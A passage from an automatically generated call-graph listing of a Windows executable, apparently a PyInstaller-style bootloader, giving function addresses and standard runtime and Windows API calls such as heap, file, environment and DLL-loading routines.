15782->15793 15786 7ff7102da658 FlsSetValue 15789 7ff7102da664 FlsSetValue 15786->15789 15790 7ff7102da676 15786->15790 15787 7ff7102da648 FlsSetValue 15788 7ff7102da651 15787->15788 15803 7ff7102d9c58 15788->15803 15789->15788 15809 7ff7102da204 15790->15809 15793->15772 15801 7ff7102ddeb9 _get_daylight 15796->15801 15797 7ff7102ddf0a 15800 7ff7102d43f4 _get_daylight 10 API calls 15797->15800 15798 7ff7102ddeee HeapAlloc 15799 7ff7102da63a 15798->15799 15798->15801 15799->15786 15799->15787 15800->15799 15801->15797 15801->15798 15802 7ff7102e28a0 _get_daylight 2 API calls 15801->15802 15802->15801 15804 7ff7102d9c8c 15803->15804 15805 7ff7102d9c5d RtlFreeHeap 15803->15805 15804->15793 15805->15804 15806 7ff7102d9c78 GetLastError 15805->15806 15807 7ff7102d9c85 __free_lconv_num 15806->15807 15808 7ff7102d43f4 _get_daylight 9 API calls 15807->15808 15808->15804 15814 7ff7102da0dc 15809->15814 15826 7ff7102df5e8 EnterCriticalSection 15814->15826 19544 7ff7102ea079 19547 7ff7102d4788 LeaveCriticalSection 19544->19547 19218 7ff7102d8c79 19219 7ff7102d96e8 45 API calls 19218->19219 19220 7ff7102d8c7e 19219->19220 19221 7ff7102d8ca5 GetModuleHandleW 19220->19221 19222 7ff7102d8cef 19220->19222 19221->19222 19228 7ff7102d8cb2 19221->19228 19230 7ff7102d8b7c 19222->19230 19228->19222 19244 7ff7102d8da0 GetModuleHandleExW 19228->19244 19250 7ff7102df5e8 EnterCriticalSection 19230->19250 19245 7ff7102d8dd4 GetProcAddress 19244->19245 19246 7ff7102d8dfd 19244->19246 19247 7ff7102d8de6 19245->19247 19248 7ff7102d8e02 FreeLibrary 19246->19248 19249 7ff7102d8e09 19246->19249 19247->19246 19248->19249 19249->19222 20181 7ff7102e9ef3 20182 7ff7102e9f03 20181->20182 20185 7ff7102d4788 LeaveCriticalSection 20182->20185 19581 7ff7102cbe70 19582 7ff7102cbe80 19581->19582 19598 7ff7102d8ec0 19582->19598 19584 7ff7102cbe8c 19604 7ff7102cc168 19584->19604 19586 7ff7102cc44c 7 API calls 19588 7ff7102cbf25 19586->19588 19587 7ff7102cbea4 _RTC_Initialize 19596 7ff7102cbef9 19587->19596 19609 7ff7102cc318 19587->19609 19590 7ff7102cbeb9 19612 7ff7102d832c 19590->19612 19596->19586 19597 7ff7102cbf15 19596->19597 19599 7ff7102d8ed1 19598->19599 19600 7ff7102d8ed9 19599->19600 19601 7ff7102d43f4 _get_daylight 11 API calls 19599->19601 19600->19584 19602 7ff7102d8ee8 19601->19602 19603 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 19602->19603 19603->19600 19605 7ff7102cc179 19604->19605 19608 7ff7102cc17e __scrt_release_startup_lock 19604->19608 19606 7ff7102cc44c 7 API calls 19605->19606 19605->19608 19607 7ff7102cc1f2 19606->19607 19608->19587 19637 7ff7102cc2dc 19609->19637 19611 7ff7102cc321 19611->19590 19613 7ff7102d834c 19612->19613 19620 7ff7102cbec5 19612->19620 19614 7ff7102d8354 19613->19614 19615 7ff7102d836a GetModuleFileNameW 19613->19615 19616 7ff7102d43f4 _get_daylight 11 API calls 19614->19616 19618 7ff7102d8395 19615->19618 19617 7ff7102d8359 19616->19617 19619 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 19617->19619 19621 7ff7102d82cc 11 API calls 19618->19621 19619->19620 19620->19596 19636 7ff7102cc3ec InitializeSListHead 19620->19636 19622 7ff7102d83d5 19621->19622 19623 7ff7102d83dd 19622->19623 19626 7ff7102d83f5 19622->19626 19624 7ff7102d43f4 _get_daylight 11 API calls 19623->19624 19625 7ff7102d83e2 19624->19625 19628 7ff7102d9c58 __free_lconv_num 11 API calls 19625->19628 19627 7ff7102d8417 19626->19627 19630 7ff7102d8443 19626->19630 19631 7ff7102d845c 19626->19631 19629 7ff7102d9c58 __free_lconv_num 11 API calls 19627->19629 19628->19620 19629->19620 19632 7ff7102d9c58 __free_lconv_num 11 API calls 19630->19632 19634 7ff7102d9c58 __free_lconv_num 11 API calls 19631->19634 19633 7ff7102d844c 19632->19633 19635 7ff7102d9c58 __free_lconv_num 11 API calls 19633->19635 19634->19627 19635->19620 19638 7ff7102cc2f6 19637->19638 19640 7ff7102cc2ef 19637->19640 19641 7ff7102d94fc 19638->19641 19640->19611 19644 7ff7102d9138 19641->19644 19651 7ff7102df5e8 EnterCriticalSection 19644->19651 19690 7ff7102d9060 19693 7ff7102d8fe4 19690->19693 19700 7ff7102df5e8 EnterCriticalSection 19693->19700 20212 7ff7102da2e0 20213 7ff7102da2e5 20212->20213 20214 7ff7102da2fa 20212->20214 20218 7ff7102da300 20213->20218 20219 7ff7102da342 20218->20219 20220 7ff7102da34a 20218->20220 20221 7ff7102d9c58 __free_lconv_num 11 API calls 20219->20221 20222 7ff7102d9c58 __free_lconv_num 11 API calls 20220->20222 20221->20220 20223 7ff7102da357 20222->20223 20224 7ff7102d9c58 __free_lconv_num 11 API calls 20223->20224 20225 7ff7102da364 20224->20225 20226 7ff7102d9c58 __free_lconv_num 11 API calls 20225->20226 20227 7ff7102da371 20226->20227 20228 7ff7102d9c58 __free_lconv_num 11 API calls 20227->20228 20229 7ff7102da37e 20228->20229 20230 7ff7102d9c58 __free_lconv_num 11 API calls 20229->20230 20231 7ff7102da38b 20230->20231 20232 7ff7102d9c58 __free_lconv_num 11 API calls 20231->20232 20233 7ff7102da398 20232->20233 20234 7ff7102d9c58 __free_lconv_num 11 API calls 20233->20234 20235 7ff7102da3a5 20234->20235 20236 7ff7102d9c58 __free_lconv_num 11 API calls 20235->20236 20237 7ff7102da3b5 20236->20237 20238 7ff7102d9c58 __free_lconv_num 11 API calls 20237->20238 20239 7ff7102da3c5 20238->20239 20244 7ff7102da1a4 20239->20244 20258 7ff7102df5e8 EnterCriticalSection 20244->20258 15828 7ff7102cbf5c 15849 7ff7102cc12c 15828->15849 15831 7ff7102cc0a8 15972 7ff7102cc44c IsProcessorFeaturePresent 15831->15972 15832 7ff7102cbf78 __scrt_acquire_startup_lock 15834 7ff7102cc0b2 15832->15834 15841 7ff7102cbf96 __scrt_release_startup_lock 15832->15841 15835 7ff7102cc44c 7 API calls 15834->15835 15837 7ff7102cc0bd __CxxCallCatchBlock 15835->15837 15836 7ff7102cbfbb 15838 7ff7102cc041 15855 7ff7102cc594 15838->15855 15840 7ff7102cc046 15858 7ff7102c1000 15840->15858 15841->15836 15841->15838 15961 7ff7102d8e44 15841->15961 15846 7ff7102cc069 15846->15837 15968 7ff7102cc2b0 15846->15968 15850 7ff7102cc134 15849->15850 15851 7ff7102cc140 __scrt_dllmain_crt_thread_attach 15850->15851 15852 7ff7102cc14d 15851->15852 15853 7ff7102cbf70 15851->15853 15852->15853 15979 7ff7102ccba8 15852->15979 15853->15831 15853->15832 16006 7ff7102e97e0 15855->16006 15859 7ff7102c1009 15858->15859 16008 7ff7102d4794 15859->16008 15861 7ff7102c352b 16015 7ff7102c33e0 15861->16015 15868 7ff7102c3736 16215 7ff7102c3f70 15868->16215 15869 7ff7102c356c 15871 7ff7102c1bf0 49 API calls 15869->15871 15886 7ff7102c3588 15871->15886 15873 7ff7102c3785 15874 7ff7102c25f0 53 API calls 15873->15874 15877 7ff7102c3538 15874->15877 16206 7ff7102cb870 15877->16206 15878 7ff7102c365f __vcrt_freefls 15883 7ff7102c3834 15878->15883 15887 7ff7102c7e10 14 API calls 15878->15887 15879 7ff7102c3778 15880 7ff7102c379f 15879->15880 15881 7ff7102c377d 15879->15881 15882 7ff7102c1bf0 49 API calls 15880->15882 16234 7ff7102cf36c 15881->16234 15885 7ff7102c37be 15882->15885 15910 7ff7102c3805 __vcrt_freefls 15883->15910 16238 7ff7102c3e90 15883->16238 15895 7ff7102c18f0 115 API calls 15885->15895 16077 7ff7102c7e10 15886->16077 15889 7ff7102c36ae 15887->15889 16090 7ff7102c7f80 15889->16090 15890 7ff7102c3852 15892 7ff7102c3871 15890->15892 15893 7ff7102c3865 15890->15893 15894 7ff7102c1bf0 49 API calls 15892->15894 16241 7ff7102c3fe0 15893->16241 15894->15910 15898 7ff7102c37df 15895->15898 15896 7ff7102c36bd 15899 7ff7102c380f 15896->15899 15903 7ff7102c36cf 15896->15903 15898->15886 15902 7ff7102c37ef 15898->15902 16099 7ff7102c8400 15899->16099 15906 7ff7102c25f0 53 API calls 15902->15906 16095 7ff7102c1bf0 15903->16095 15905 7ff7102c389e SetDllDirectoryW 15913 7ff7102c38c3 15905->15913 15906->15877 16150 7ff7102c86b0 15910->16150 15911 7ff7102c36fc 16195 7ff7102c25f0 15911->16195 15915 7ff7102c3a50 15913->15915 16155 7ff7102c6560 15913->16155 15917 7ff7102c3a5a PostMessageW GetMessageW 15915->15917 15918 7ff7102c3a7d 15915->15918 15917->15918 16299 7ff7102c3080 15918->16299 15921 7ff7102c38ea 15923 7ff7102c3947 15921->15923 15925 7ff7102c3901 15921->15925 16244 7ff7102c65a0 15921->16244 15923->15915 15929 7ff7102c395c 15923->15929 15937 7ff7102c3905 15925->15937 16265 7ff7102c6970 15925->16265 16175 7ff7102c30e0 15929->16175 15933 7ff7102c6780 FreeLibrary 15936 7ff7102c3aa3 15933->15936 15937->15923 16281 7ff7102c2870 15937->16281 15962 7ff7102d8e7c 15961->15962 15963 7ff7102d8e5b 15961->15963 18418 7ff7102d96e8 15962->18418 15963->15838 15966 7ff7102cc5d8 GetModuleHandleW 15967 7ff7102cc5e9 15966->15967 15967->15846 15970 7ff7102cc2c1 15968->15970 15969 7ff7102cc080 15969->15836 15970->15969 15971 7ff7102ccba8 7 API calls 15970->15971 15971->15969 15973 7ff7102cc472 _isindst memcpy_s 15972->15973 15974 7ff7102cc491 RtlCaptureContext RtlLookupFunctionEntry 15973->15974 15975 7ff7102cc4ba RtlVirtualUnwind 15974->15975 15976 7ff7102cc4f6 memcpy_s 15974->15976 15975->15976 15977 7ff7102cc528 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15976->15977 15978 7ff7102cc576 _isindst 15977->15978 15978->15834 15980 7ff7102ccbb0 15979->15980 15981 7ff7102ccbba 15979->15981 15985 7ff7102ccf44 15980->15985 15981->15853 15986 7ff7102ccf53 15985->15986 15987 7ff7102ccbb5 15985->15987 15993 7ff7102cd180 15986->15993 15989 7ff7102ccfb0 15987->15989 15990 7ff7102ccfdb 15989->15990 15991 7ff7102ccfdf 15990->15991 15992 7ff7102ccfbe DeleteCriticalSection 15990->15992 15991->15981 15992->15990 15997 7ff7102ccfe8 15993->15997 15998 7ff7102cd0d2 TlsFree 15997->15998 16004 7ff7102cd02c __vcrt_InitializeCriticalSectionEx 15997->16004 15999 7ff7102cd05a LoadLibraryExW 16001 7ff7102cd07b GetLastError 15999->16001 16002 7ff7102cd0f9 15999->16002 16000 7ff7102cd119 GetProcAddress 16000->15998 16001->16004 16002->16000 16003 7ff7102cd110 FreeLibrary 16002->16003 16003->16000 16004->15998 16004->15999 16004->16000 16005 7ff7102cd09d LoadLibraryExW 16004->16005 16005->16002 16005->16004 16007 7ff7102cc5ab GetStartupInfoW 16006->16007 16007->15840 16011 7ff7102de790 16008->16011 16009 7ff7102de7e3 16312 7ff7102d9b24 16009->16312 16011->16009 16012 7ff7102de836 16011->16012 16322 7ff7102de668 16012->16322 16014 7ff7102de80c 16014->15861 16368 7ff7102cbb70 16015->16368 16018 7ff7102c3438 16370 7ff7102c85a0 FindFirstFileExW 16018->16370 16019 7ff7102c341b 16375 7ff7102c29e0 16019->16375 16023 7ff7102c34a5 16394 7ff7102c8760 16023->16394 16024 7ff7102c344b 16385 7ff7102c8620 CreateFileW 16024->16385 16026 7ff7102cb870 _log10_special 8 API calls 16029 7ff7102c34dd 16026->16029 16028 7ff7102c34b3 16032 7ff7102c26c0 49 API calls 16028->16032 16036 7ff7102c342e 16028->16036 16029->15877 16037 7ff7102c18f0 16029->16037 16031 7ff7102c345c 16388 7ff7102c26c0 16031->16388 16032->16036 16035 7ff7102c3474 __vcrt_InitializeCriticalSectionEx 16035->16023 16036->16026 16038 7ff7102c3f70 108 API calls 16037->16038 16039 7ff7102c1925 16038->16039 16040 7ff7102c1bb6 16039->16040 16042 7ff7102c76a0 83 API calls 16039->16042 16041 7ff7102cb870 _log10_special 8 API calls 16040->16041 16043 7ff7102c1bd1 16041->16043 16044 7ff7102c196b 16042->16044 16043->15868 16043->15869 16076 7ff7102c199c 16044->16076 16792 7ff7102cf9f4 16044->16792 16045 7ff7102cf36c 74 API calls 16045->16040 16047 7ff7102c1985 16048 7ff7102c19a1 16047->16048 16049 7ff7102c1989 16047->16049 16796 7ff7102cf6bc 16048->16796 16799 7ff7102c2760 16049->16799 16053 7ff7102c19bf 16054 7ff7102c2760 53 API calls 16053->16054 16054->16076 16055 7ff7102c19d7 16056 7ff7102c1a06 16055->16056 16057 7ff7102c19ee 16055->16057 16059 7ff7102c1bf0 49 API calls 16056->16059 16058 7ff7102c2760 53 API calls 16057->16058 16058->16076 16060 7ff7102c1a1d 16059->16060 16061 7ff7102c1bf0 49 API calls 16060->16061 16062 7ff7102c1a68 16061->16062 16063 7ff7102cf9f4 73 API calls 16062->16063 16064 7ff7102c1a8c 16063->16064 16065 7ff7102c1aa1 16064->16065 16066 7ff7102c1ab9 16064->16066 16067 7ff7102c2760 53 API calls 16065->16067 16068 7ff7102cf6bc _fread_nolock 53 API calls 16066->16068 16067->16076 16069 7ff7102c1ace 16068->16069 16070 7ff7102c1ad4 16069->16070 16071 7ff7102c1aec 16069->16071 16073 7ff7102c2760 53 API calls 16070->16073 16816 7ff7102cf430 16071->16816 16073->16076 16075 7ff7102c25f0 53 API calls 16075->16076 16076->16045 16078 7ff7102c7e1a 16077->16078 16079 7ff7102c86b0 2 API calls 16078->16079 16080 7ff7102c7e39 GetEnvironmentVariableW 16079->16080 16081 7ff7102c7ea2 16080->16081 16082 7ff7102c7e56 ExpandEnvironmentStringsW 16080->16082 16083 7ff7102cb870 _log10_special 8 API calls 16081->16083 16082->16081 16084 7ff7102c7e78 16082->16084 16086 7ff7102c7eb4 16083->16086 16085 7ff7102c8760 2 API calls 16084->16085 16087 7ff7102c7e8a 16085->16087 16086->15878 16088 7ff7102cb870 _log10_special 8 API calls 16087->16088 16089 7ff7102c7e9a 16088->16089 16089->15878 16091 7ff7102c86b0 2 API calls 16090->16091 16092 7ff7102c7f94 16091->16092 17025 7ff7102d7548 16092->17025 16094 7ff7102c7fa6 __vcrt_freefls 16094->15896 16096 7ff7102c1c15 16095->16096 16097 7ff7102d3ca4 49 API calls 16096->16097 16098 7ff7102c1c38 16097->16098 16098->15910 16098->15911 16100 7ff7102c8415 16099->16100 17043 7ff7102c7b50 GetCurrentProcess OpenProcessToken 16100->17043 16103 7ff7102c7b50 7 API calls 16104 7ff7102c8441 16103->16104 16105 7ff7102c8474 16104->16105 16106 7ff7102c845a 16104->16106 16107 7ff7102c2590 48 API calls 16105->16107 16108 7ff7102c2590 48 API calls 16106->16108 16109 7ff7102c8487 LocalFree LocalFree 16107->16109 16110 7ff7102c8472 16108->16110 16111 7ff7102c84a3 16109->16111 16113 7ff7102c84af 16109->16113 16110->16109 17053 7ff7102c2940 16111->17053 16114 7ff7102cb870 _log10_special 8 API calls 16113->16114 16151 7ff7102c86d2 MultiByteToWideChar 16150->16151 16152 7ff7102c86f6 16150->16152 16151->16152 16154 7ff7102c870c __vcrt_freefls 16151->16154 16153 7ff7102c8713 MultiByteToWideChar 16152->16153 16152->16154 16153->16154 16154->15905 16156 7ff7102c6575 16155->16156 16157 7ff7102c38d5 16156->16157 16158 7ff7102c2760 53 API calls 16156->16158 16159 7ff7102c6b00 16157->16159 16158->16157 16160 7ff7102c6b30 16159->16160 16163 7ff7102c6b4a __vcrt_freefls 16159->16163 16160->16163 17337 7ff7102c1440 16160->17337 16162 7ff7102c6b54 16162->16163 16164 7ff7102c3fe0 49 API calls 16162->16164 16163->15921 16165 7ff7102c6b76 16164->16165 16166 7ff7102c3fe0 49 API calls 16165->16166 16169 7ff7102c6b7b 16165->16169 16168 7ff7102c6b9a 16166->16168 16167 7ff7102c2870 53 API calls 16167->16163 16168->16169 16170 7ff7102c3fe0 49 API calls 16168->16170 16169->16167 16171 7ff7102c6bb6 16170->16171 16171->16169 16172 7ff7102c6bbf 16171->16172 16181 7ff7102c30ee memcpy_s 16175->16181 16176 7ff7102c32e7 16177 7ff7102cb870 _log10_special 8 API calls 16176->16177 16178 7ff7102c338e 16177->16178 16178->15877 16194 7ff7102c83e0 LocalFree 16178->16194 16180 7ff7102c1bf0 49 API calls 16180->16181 16181->16176 16181->16180 16186 7ff7102c32e9 16181->16186 16187 7ff7102c2870 53 API calls 16181->16187 16189 7ff7102c3309 16181->16189 16192 7ff7102c32f7 16181->16192 17398 7ff7102c3f10 16181->17398 17404 7ff7102c7530 16181->17404 17416 7ff7102c15c0 16181->17416 17454 7ff7102c68e0 16181->17454 17458 7ff7102c3b40 16181->17458 17502 7ff7102c3e00 16181->17502 16183 7ff7102c25f0 53 API calls 16183->16176 16188 7ff7102c25f0 53 API calls 16186->16188 16187->16181 16188->16176 16189->16183 16193 7ff7102c25f0 53 API calls 16192->16193 16193->16176 16196 7ff7102c262a 16195->16196 16197 7ff7102d3ca4 49 API calls 16196->16197 16198 7ff7102c2652 16197->16198 16199 7ff7102c86b0 2 API calls 16198->16199 16200 7ff7102c266a 16199->16200 16201 7ff7102c2677 MessageBoxW 16200->16201 16202 7ff7102c268e MessageBoxA 16200->16202 16203 7ff7102c26a0 16201->16203 16202->16203 16207 7ff7102cb879 16206->16207 16208 7ff7102cbc00 IsProcessorFeaturePresent 16207->16208 16209 7ff7102c372a 16207->16209 16210 7ff7102cbc18 16208->16210 16209->15966 17638 7ff7102cbdf8 RtlCaptureContext 16210->17638 16216 7ff7102c3f7c 16215->16216 16217 7ff7102c86b0 2 API calls 16216->16217 16218 7ff7102c3fa4 16217->16218 16219 7ff7102c86b0 2 API calls 16218->16219 16220 7ff7102c3fb7 16219->16220 17643 7ff7102d52a4 16220->17643 16223 7ff7102cb870 _log10_special 8 API calls 16224 7ff7102c3746 16223->16224 16224->15873 16225 7ff7102c76a0 16224->16225 16226 7ff7102c76c4 16225->16226 16227 7ff7102cf9f4 73 API calls 16226->16227 16228 7ff7102c779b __vcrt_freefls 16226->16228 16229 7ff7102c76e0 16227->16229 16228->15879 16229->16228 18034 7ff7102d6bd8 16229->18034 16231 7ff7102cf9f4 73 API calls 16233 7ff7102c76f5 16231->16233 16232 7ff7102cf6bc _fread_nolock 53 API calls 16232->16233 16233->16228 16233->16231 16233->16232 16235 7ff7102cf39c 16234->16235 18049 7ff7102cf148 16235->18049 16237 7ff7102cf3b5 16237->15873 16239 7ff7102c1bf0 49 API calls 16238->16239 16240 7ff7102c3ead 16239->16240 16240->15890 16242 7ff7102c1bf0 49 API calls 16241->16242 16243 7ff7102c4010 16242->16243 16243->15910 16243->16243 16262 7ff7102c65bc 16244->16262 16245 7ff7102c66df 16246 7ff7102cb870 _log10_special 8 API calls 16245->16246 16247 7ff7102c66f1 16246->16247 16247->15925 16248 7ff7102c17e0 45 API calls 16248->16262 16249 7ff7102c675d 16251 7ff7102c25f0 53 API calls 16249->16251 16250 7ff7102c1bf0 49 API calls 16250->16262 16251->16245 16252 7ff7102c674a 16253 7ff7102c25f0 53 API calls 16252->16253 16253->16245 16254 7ff7102c3f10 10 API calls 16254->16262 16255 7ff7102c670d 16257 7ff7102c25f0 53 API calls 16255->16257 16256 7ff7102c7530 52 API calls 16256->16262 16257->16245 16258 7ff7102c2870 53 API calls 16258->16262 16259 7ff7102c6737 16260 7ff7102c25f0 53 API calls 16259->16260 16260->16245 16261 7ff7102c15c0 118 API calls 16261->16262 16262->16245 16262->16248 16262->16249 16262->16250 16262->16252 16262->16254 16262->16255 16262->16256 16262->16258 16262->16259 16262->16261 16263 7ff7102c6720 16262->16263 16264 7ff7102c25f0 53 API calls 16263->16264 16264->16245 18060 7ff7102c81a0 16265->18060 16267 7ff7102c6989 16268 7ff7102c81a0 3 API calls 16267->16268 16269 7ff7102c699c 16268->16269 16270 7ff7102c69cf 16269->16270 16271 7ff7102c69b4 16269->16271 16272 7ff7102c25f0 53 API calls 16270->16272 18064 7ff7102c6ea0 GetProcAddress 16271->18064 16274 7ff7102c3916 16272->16274 16274->15937 16275 7ff7102c6cd0 16274->16275 16276 7ff7102c6ced 16275->16276 16282 7ff7102c28aa 16281->16282 16283 7ff7102d3ca4 49 API calls 16282->16283 16284 7ff7102c28d2 16283->16284 16285 7ff7102c86b0 2 API calls 16284->16285 16286 7ff7102c28ea 16285->16286 16287 7ff7102c28f7 MessageBoxW 16286->16287 16288 7ff7102c290e MessageBoxA 16286->16288 16289 7ff7102c2920 16287->16289 16288->16289 16290 7ff7102cb870 _log10_special 8 API calls 16289->16290 16291 7ff7102c2930 16290->16291 16292 7ff7102c6780 16291->16292 18129 7ff7102c5af0 16299->18129 16302 7ff7102c30b9 16308 7ff7102c33a0 16302->16308 16309 7ff7102c33ae 16308->16309 16310 7ff7102c33bf 16309->16310 18417 7ff7102c8180 FreeLibrary 16309->18417 16310->15933 16329 7ff7102d986c 16312->16329 16317 7ff7102d9b5f 16317->16014 16367 7ff7102d477c EnterCriticalSection 16322->16367 16330 7ff7102d98c3 16329->16330 16331 7ff7102d9888 GetLastError 16329->16331 16330->16317 16335 7ff7102d98d8 16330->16335 16332 7ff7102d9898 16331->16332 16342 7ff7102da6a0 16332->16342 16336 7ff7102d98f4 GetLastError SetLastError 16335->16336 16337 7ff7102d990c 16335->16337 16336->16337 16337->16317 16338 7ff7102d9c10 IsProcessorFeaturePresent 16337->16338 16339 7ff7102d9c23 16338->16339 16359 7ff7102d9924 16339->16359 16343 7ff7102da6bf FlsGetValue 16342->16343 16344 7ff7102da6da FlsSetValue 16342->16344 16345 7ff7102da6d4 16343->16345 16346 7ff7102d98b3 SetLastError 16343->16346 16344->16346 16347 7ff7102da6e7 16344->16347 16345->16344 16346->16330 16348 7ff7102ddea8 _get_daylight 11 API calls 16347->16348 16349 7ff7102da6f6 16348->16349 16350 7ff7102da714 FlsSetValue 16349->16350 16351 7ff7102da704 FlsSetValue 16349->16351 16353 7ff7102da720 FlsSetValue 16350->16353 16354 7ff7102da732 16350->16354 16352 7ff7102da70d 16351->16352 16355 7ff7102d9c58 __free_lconv_num 11 API calls 16352->16355 16353->16352 16356 7ff7102da204 _get_daylight 11 API calls 16354->16356 16355->16346 16357 7ff7102da73a 16356->16357 16358 7ff7102d9c58 __free_lconv_num 11 API calls 16357->16358 16358->16346 16360 7ff7102d995e _isindst memcpy_s 16359->16360 16361 7ff7102d9986 RtlCaptureContext RtlLookupFunctionEntry 16360->16361 16362 7ff7102d99f6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16361->16362 16363 7ff7102d99c0 RtlVirtualUnwind 16361->16363 16365 7ff7102d9a48 _isindst 16362->16365 16363->16362 16364 7ff7102cb870 _log10_special 8 API calls 16366 7ff7102d9a67 GetCurrentProcess TerminateProcess 16364->16366 16365->16364 16369 7ff7102c33ec GetModuleFileNameW 16368->16369 16369->16018 16369->16019 16371 7ff7102c85df FindClose 16370->16371 16372 7ff7102c85f2 16370->16372 16371->16372 16373 7ff7102cb870 _log10_special 8 API calls 16372->16373 16374 7ff7102c3442 16373->16374 16374->16023 16374->16024 16376 7ff7102cbb70 16375->16376 16377 7ff7102c29fc GetLastError 16376->16377 16378 7ff7102c2a29 16377->16378 16399 7ff7102d3ef8 16378->16399 16383 7ff7102cb870 _log10_special 8 API calls 16384 7ff7102c2ae5 16383->16384 16384->16036 16386 7ff7102c8660 GetFinalPathNameByHandleW CloseHandle 16385->16386 16387 7ff7102c3458 16385->16387 16386->16387 16387->16031 16387->16035 16389 7ff7102c26fa 16388->16389 16390 7ff7102d3ef8 48 API calls 16389->16390 16391 7ff7102c2722 MessageBoxW 16390->16391 16392 7ff7102cb870 _log10_special 8 API calls 16391->16392 16393 7ff7102c274c 16392->16393 16393->16036 16395 7ff7102c87b5 16394->16395 16396 7ff7102c878a WideCharToMultiByte 16394->16396 16397 7ff7102c87d2 WideCharToMultiByte 16395->16397 16398 7ff7102c87cb __vcrt_freefls 16395->16398 16396->16395 16396->16398 16397->16398 16398->16028 16401 7ff7102d3f52 16399->16401 16400 7ff7102d3f77 16402 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16400->16402 16401->16400 16403 7ff7102d3fb3 16401->16403 16405 7ff7102d3fa1 16402->16405 16421 7ff7102d22b0 16403->16421 16408 7ff7102cb870 _log10_special 8 API calls 16405->16408 16406 7ff7102d4094 16407 7ff7102d9c58 __free_lconv_num 11 API calls 16406->16407 16407->16405 16409 7ff7102c2a54 FormatMessageW 16408->16409 16417 7ff7102c2590 16409->16417 16411 7ff7102d4069 16413 7ff7102d9c58 __free_lconv_num 11 API calls 16411->16413 16412 7ff7102d40ba 16412->16406 16415 7ff7102d40c4 16412->16415 16413->16405 16414 7ff7102d4060 16414->16406 16414->16411 16416 7ff7102d9c58 __free_lconv_num 11 API calls 16415->16416 16416->16405 16418 7ff7102c25b5 16417->16418 16419 7ff7102d3ef8 48 API calls 16418->16419 16420 7ff7102c25d8 MessageBoxW 16419->16420 16420->16383 16422 7ff7102d22ee 16421->16422 16423 7ff7102d22de 16421->16423 16424 7ff7102d22f7 16422->16424 16428 7ff7102d2325 16422->16428 16425 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16423->16425 16426 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16424->16426 16427 7ff7102d231d 16425->16427 16426->16427 16427->16406 16427->16411 16427->16412 16427->16414 16428->16423 16428->16427 16432 7ff7102d2cc4 16428->16432 16465 7ff7102d2710 16428->16465 16502 7ff7102d1ea0 16428->16502 16433 7ff7102d2d06 16432->16433 16434 7ff7102d2d77 16432->16434 16435 7ff7102d2da1 16433->16435 16436 7ff7102d2d0c 16433->16436 16437 7ff7102d2dd0 16434->16437 16438 7ff7102d2d7c 16434->16438 16525 7ff7102d1074 16435->16525 16439 7ff7102d2d40 16436->16439 16440 7ff7102d2d11 16436->16440 16444 7ff7102d2de7 16437->16444 16446 7ff7102d2dda 16437->16446 16451 7ff7102d2ddf 16437->16451 16441 7ff7102d2db1 16438->16441 16442 7ff7102d2d7e 16438->16442 16447 7ff7102d2d17 16439->16447 16439->16451 16440->16444 16440->16447 16532 7ff7102d0c64 16441->16532 16445 7ff7102d2d20 16442->16445 16454 7ff7102d2d8d 16442->16454 16539 7ff7102d39cc 16444->16539 16463 7ff7102d2e10 16445->16463 16505 7ff7102d3478 16445->16505 16446->16435 16446->16451 16447->16445 16452 7ff7102d2d52 16447->16452 16461 7ff7102d2d3b 16447->16461 16451->16463 16543 7ff7102d1484 16451->16543 16452->16463 16515 7ff7102d37b4 16452->16515 16454->16435 16456 7ff7102d2d92 16454->16456 16456->16463 16521 7ff7102d3878 16456->16521 16457 7ff7102cb870 _log10_special 8 API calls 16458 7ff7102d310a 16457->16458 16458->16428 16461->16463 16464 7ff7102d2ffc 16461->16464 16550 7ff7102d3ae0 16461->16550 16463->16457 16464->16463 16556 7ff7102ddd18 16464->16556 16466 7ff7102d2734 16465->16466 16467 7ff7102d271e 16465->16467 16470 7ff7102d9b24 _invalid_parameter_noinfo 37 API calls 16466->16470 16489 7ff7102d2774 16466->16489 16468 7ff7102d2d06 16467->16468 16469 7ff7102d2d77 16467->16469 16467->16489 16471 7ff7102d2d0c 16468->16471 16474 7ff7102d2da1 16468->16474 16472 7ff7102d2dd0 16469->16472 16473 7ff7102d2d7c 16469->16473 16470->16489 16475 7ff7102d2d40 16471->16475 16476 7ff7102d2d11 16471->16476 16480 7ff7102d2de7 16472->16480 16482 7ff7102d2dda 16472->16482 16486 7ff7102d2ddf 16472->16486 16477 7ff7102d2db1 16473->16477 16478 7ff7102d2d7e 16473->16478 16479 7ff7102d1074 38 API calls 16474->16479 16483 7ff7102d2d17 16475->16483 16475->16486 16476->16480 16476->16483 16484 7ff7102d0c64 38 API calls 16477->16484 16481 7ff7102d2d20 16478->16481 16491 7ff7102d2d8d 16478->16491 16498 7ff7102d2d3b 16479->16498 16487 7ff7102d39cc 45 API calls 16480->16487 16485 7ff7102d3478 47 API calls 16481->16485 16501 7ff7102d2e10 16481->16501 16482->16474 16482->16486 16483->16481 16488 7ff7102d2d52 16483->16488 16483->16498 16484->16498 16485->16498 16490 7ff7102d1484 38 API calls 16486->16490 16486->16501 16487->16498 16492 7ff7102d37b4 46 API calls 16488->16492 16488->16501 16489->16428 16490->16498 16491->16474 16493 7ff7102d2d92 16491->16493 16492->16498 16496 7ff7102d3878 37 API calls 16493->16496 16493->16501 16494 7ff7102cb870 _log10_special 8 API calls 16495 7ff7102d310a 16494->16495 16495->16428 16496->16498 16497 7ff7102d3ae0 45 API calls 16500 7ff7102d2ffc 16497->16500 16498->16497 16498->16500 16498->16501 16499 7ff7102ddd18 46 API calls 16499->16500 16500->16499 16500->16501 16501->16494 16775 7ff7102d02e8 16502->16775 16506 7ff7102d349e 16505->16506 16568 7ff7102cfea0 16506->16568 16511 7ff7102d3ae0 45 API calls 16512 7ff7102d35e3 16511->16512 16512->16512 16513 7ff7102d3ae0 45 API calls 16512->16513 16514 7ff7102d3671 16512->16514 16513->16514 16514->16461 16516 7ff7102d37e9 16515->16516 16517 7ff7102d3807 16516->16517 16518 7ff7102d382e 16516->16518 16519 7ff7102d3ae0 45 API calls 16516->16519 16520 7ff7102ddd18 46 API calls 16517->16520 16518->16461 16519->16517 16520->16518 16524 7ff7102d3899 16521->16524 16522 7ff7102d9b24 _invalid_parameter_noinfo 37 